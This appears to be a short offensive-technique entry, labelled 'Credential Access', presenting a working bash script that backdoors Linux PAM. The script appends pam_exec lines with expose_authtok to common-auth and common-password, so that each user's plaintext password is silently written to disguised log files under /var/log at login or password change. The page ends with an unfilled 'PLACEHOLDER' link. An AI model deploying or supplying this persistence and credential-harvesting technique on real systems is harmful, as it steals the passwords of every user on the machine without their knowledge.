Secondary Categories: 02-Credential Access
Each time a user authenticates or changes their password it will be logged in the log file we specified.
#!/bin/bash
# Creating a log file
touch /var/log/systok.log
touch /var/log/syscommon.log
#
echo "auth required pam_exec.so expose_authtok log=/var/log/systok.log /bin/cat" >> /etc/pam.d/common-auth
echo "auth required pam_exec.so expose_authtok log=/var/log/syscommon.log /bin/cat" >> /etc/pam.d/common-password
Also Check Out:
- PLACEHOLDER